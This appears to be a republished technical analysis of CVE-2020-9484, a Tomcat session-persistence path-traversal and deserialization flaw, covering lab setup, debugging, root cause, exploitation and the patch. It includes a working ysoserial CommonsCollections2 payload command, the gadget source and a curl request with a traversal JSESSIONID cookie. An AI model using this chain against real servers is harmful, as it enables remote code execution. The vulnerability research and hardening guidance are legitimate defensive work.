
Example Analysis of CVE-2020-9484 tomcat session deserialization vulnerability

2025-04-04 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

This article walks through an example analysis of the CVE-2020-9484 Tomcat session deserialization vulnerability in some detail; readers who are interested can use it as a reference.

Using CVE-2020-9484 as the vehicle, it covers local and remote debugging of the Tomcat source code, analyzes the root cause of the vulnerability and its patch, and examines the ysoserial deserialization gadget chain.

0x01 Brief introduction of the vulnerability

Apache Tomcat published an announcement fixing a remote code execution vulnerability (CVE-2020-9484) rooted in persistent sessions. The preconditions are strict: 1. Tomcat must have session persistence enabled with the FileStore (a PersistentManager backed by a FileStore). 2. A usable gadget chain must be present among the dependencies in tomcat/lib or WEB-INF/lib. 3. The attacker must be able to control the contents of a file at a known path on the server. The Tomcat advisory additionally notes that the PersistentManager's sessionAttributeValueClassNameFilter must be unset (the default when no SecurityManager is in use) or lax enough to let the gadget classes through.

0x02 Affected versions

Apache Tomcat 10.x < 10.0.0-M5
Apache Tomcat 9.x < 9.0.35
Apache Tomcat 8.x < 8.5.55
Apache Tomcat 7.x < 7.0.104

0x03 Vulnerability preconditions (lab setup)

Download Tomcat 8.5.30 from the official site.

0x1 Configure session persistence in conf/context.xml

0x2 Deploy the gadget jar: download commons-collections4-4.0.jar and place it in Tomcat's lib/ directory
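The context.xml setting referred to in 0x1, as an added example; the original shows it only as a screenshot, so this is not the author's own configuration. The directory value is an assumption, chosen so that the trigger cookie used later in the article (JSESSIONID=../tmp/test) resolves to /tmp/test.session; if directory is omitted, FileStore uses the context's work directory under $CATALINA_BASE/work. The commented-out second Manager shows the hardening knob the advisory refers to, beside the weak lab setting.

```xml
<!-- conf/context.xml: added example, not the author's configuration (shown only as an image in the original) -->
<Context>
    <!-- Lab setting that makes CVE-2020-9484 reachable on Tomcat 8.5.30: sessions are
         persisted by FileStore as <directory>/<session id>.session. The directory value
         is an assumption; with directory="/tmp" the cookie JSESSIONID=../tmp/test resolves
         to /tmp/../tmp/test.session, i.e. /tmp/test.session. -->
    <Manager className="org.apache.catalina.session.PersistentManager">
        <Store className="org.apache.catalina.session.FileStore" directory="/tmp"/>
    </Manager>

    <!-- Hardened alternative, in addition to upgrading past the fixed release: restrict the
         classes that may be deserialized from a stored session. java.util.PriorityQueue and
         the commons-collections4 gadget classes do not match the pattern, so the stream is
         rejected by CustomObjectInputStream before any gadget runs. Application-specific
         attribute types must be added to the pattern or they will fail to persist.
    <Manager className="org.apache.catalina.session.PersistentManager"
             sessionAttributeValueClassNameFilter="java\.lang\.(?:Boolean|Integer|Long|Number|String)">
        <Store className="org.apache.catalina.session.FileStore"/>
    </Manager>
    -->
</Context>
```

Without a SecurityManager the filter defaults to null, which is exactly the permissive state the vulnerability needs; the pattern shown is the one Tomcat itself applies when a SecurityManager is enabled.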

0x04 multiple Tomcat debugging methods

0x1 local debugging

Use IntelliJ IDEA for local debugging: create a project, add a Tomcat server, add the Tomcat source package, and configure the project's library files.

Step1 create a project

Create a Web Application project.

Step2 add the Tomcat server

In Run/Debug Configurations, configure the Tomcat server information as shown in the following figure.

Select Tomcat Server > Local, set the Tomcat home path, configure the port, etc.

Step3 add the Tomcat source code

Add the Tomcat source code to IntelliJ IDEA.

Step4 configure the project library files

So that IntelliJ can index the code for debugging, add the Tomcat-related jars and source code as a project library, as shown in the following figure.

0x2 remote debugging

Use IntelliJ IDEA for remote debugging: modify the default startup script to add a remote debugging configuration.

0x1 modify the startup script

Modify the startup script (catalina.sh on Linux/macOS, catalina.bat on Windows) to add the debug options; the debug port is 5005. Afterwards, make sure the port is actually reachable, i.e. not blocked by a firewall.

CATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005"

-Xdebug, -Xnoagent and -Djava.compiler=NONE are legacy switches kept for old JVMs; on a current JDK the single option -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 is equivalent. Note that from JDK 9 on, address=5005 binds to localhost only; use address=*:5005 if the debugger connects from another host. Tomcat's catalina.sh also has a built-in jpda start mode (configured through JPDA_ADDRESS and JPDA_SUSPEND) that sets the same options without editing the script.

Check that the port is listening:

$ lsof -i :5005
COMMAND   PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
java    65934 xx     6u  IPv4 0x66cb19ff98f7365b      0t0  TCP localhost:avt-profile-2 (LISTEN)

lsof prints the /etc/services name avt-profile-2 for port 5005; add -P to see the numeric port. The listener here is bound to localhost only, which is fine for debugging on the same machine but will not accept a connection from a remote IDE.

0x2 open the project

Open the Tomcat 8.5.30 source code directly.

0x3 configure the debug properties

Configure the debug IP and port in IntelliJ IDEA (Run/Debug Configurations > Remote).

0x05 Vulnerability principle and trigger analysis

When Tomcat's session persistence feature is in use and a request carries a session id that is not held in memory, Tomcat tries to read the corresponding session file from the store and deserialize its contents.

The specific logic is as follows:

0x1 path concatenation

If session persistence is enabled, Tomcat uses the session id as the file name and reads that file.

Java path: org.apache.catalina.session.FileStore

In the file() method the id is concatenated directly into the path (store directory + id + ".session") with no validation of the id, so an id containing "../" segments can traverse up to the root directory.

0x2 deserialization

Having built the path, Tomcat reads the file and hands its contents to an ObjectInputStream in FileStore.load(). If the attacker can also place a file with controlled contents on the server, for example through a file upload vulnerability, this turns into deserialization RCE.

0x06 vulnerability exploitation

0x1 generate the payload

The deserialization file is generated with ysoserial. The generation method and the principle behind it are as follows: generate a CommonsCollections2 deserialization payload that pops up the calculator (the command below is a macOS path; substitute any command for your target).

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections2 "/Applications/Calculator.app/Contents/MacOS/Calculator" > /tmp/test.session

The key payload-generation code in ysoserial (ysoserial/payloads/CommonsCollections2.java; the listing in the original was a decompiled one-liner, reproduced here with its package, imports and comments restored):

package ysoserial.payloads;

import java.util.PriorityQueue;
import java.util.Queue;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
@Authors({"frohoff"})
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {

    public Queue<Object> getObject(String command) throws Exception {
        // TemplatesImpl whose embedded bytecode runs the command once newTransformer() is called
        Object templates = Gadgets.createTemplatesImpl(command);
        // Harmless placeholder method name so the queue can be built without firing anything
        InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
        // PriorityQueue whose comparator applies the transformer to each element in compare()
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(transformer));
        // Stub elements, replaced below
        queue.add(1);
        queue.add(1);
        // Arm the transformer: compare() will now invoke newTransformer() on the elements
        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
        // Swap the backing array so element 0 is the TemplatesImpl that gets transformed on readObject()
        Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = templates;
        queueArray[1] = 1;
        return queue;
    }

    public static void main(String[] args) throws Exception {
        PayloadRunner.run(CommonsCollections2.class, args);
    }
}

Complete gadget chain

/*
 * Gadget chain:
 *   ObjectInputStream.readObject()
 *     PriorityQueue.readObject()
 *       ...
 *         TransformingComparator.compare()
 *           InvokerTransformer.transform()
 *             Method.invoke()
 *               Runtime.exec()
 */

For more information about the use of chain correlation, please refer to https://xz.aliyun.com/t/1756

0x2 trigger

curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../tmp/test'

Two details matter here. FileStore appends ".session" to the id, so the cookie value ../tmp/test maps to <store directory>/../tmp/test.session, which is why the payload was written to /tmp/test.session. And the ".." segments are resolved relative to the directory attribute of the FileStore in context.xml (the context's work directory under $CATALINA_BASE/work when it is not set), so the number of segments has to match that configuration.

The call stack can also be seen in the error output echoed back for the request.

0x07 vulnerability patch

Looking at the Tomcat 8.5.55 source on GitHub, the fix is in the file-path check of FileStore: the canonical path of the file resolved from the session id must lie inside the store directory, otherwise the id is rejected. No bypass is known at present.
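The path construction described in 0x05 0x1 and the check introduced by the patch, side by side, as an added example. This is not Tomcat's source verbatim: the two methods are modelled on FileStore.file() before and after the fix (the real method also logs a warning when the check fails), and the store directory and session ids are constructed inputs.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Path;

// Added example modelled on org.apache.catalina.session.FileStore.file(); not Tomcat's code verbatim.
public class FileStorePathCheck {

    // Tomcat appends this suffix to the session id to form the file name.
    static final String FILE_EXT = ".session";

    // Pre-8.5.55 behaviour: the id is joined directly under the store directory with no
    // validation, so "../" segments in the JSESSIONID cookie walk out of the directory.
    static File vulnerableFile(File storageDir, String id) {
        return new File(storageDir, id + FILE_EXT);
    }

    // Patched behaviour: the canonical path of the resolved file must start with the
    // canonical store directory; anything else is rejected (Tomcat logs it and returns null).
    static File patchedFile(File storageDir, String id) throws IOException {
        File file = new File(storageDir, id + FILE_EXT);
        Path base = storageDir.getCanonicalFile().toPath();
        if (!file.getCanonicalFile().toPath().startsWith(base)) {
            return null;
        }
        return file;
    }

    public static void main(String[] args) throws IOException {
        // Constructed store directory; Tomcat's default is the context's work directory.
        File storageDir = new File("/opt/tomcat/work/Catalina/localhost/ROOT");

        String[] ids = {
            "A1B2C3D4E5F6",                 // ordinary session id
            "../../../../../../tmp/test",   // traversal id: six ".." to reach "/" from storageDir
            "sub/../A1B2C3D4E5F6"           // contains ".." but still resolves inside storageDir
        };

        for (String id : ids) {
            File vuln = vulnerableFile(storageDir, id);
            File safe = patchedFile(storageDir, id);
            System.out.println("id=" + id);
            System.out.println("  vulnerable -> " + vuln.getCanonicalPath());
            System.out.println("  patched    -> " + (safe == null ? "rejected" : safe.getCanonicalPath()));
        }
        // The traversal id resolves to <root>/tmp/test.session under the old code and is rejected
        // by the patched check; the third id passes both, because the fix checks the canonical
        // destination rather than blacklisting ".." in the id.
    }
}
```

Because the check uses getCanonicalFile(), a symlink inside the store directory that points outside it is rejected as well. The check does not help, however, when the store directory itself is attacker-writable (a directory="/tmp" style configuration): then no traversal is needed and a plain id naming the planted file is enough, so the directory must be writable only by Tomcat.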

This concludes the example analysis of the CVE-2020-9484 Tomcat session deserialization vulnerability.
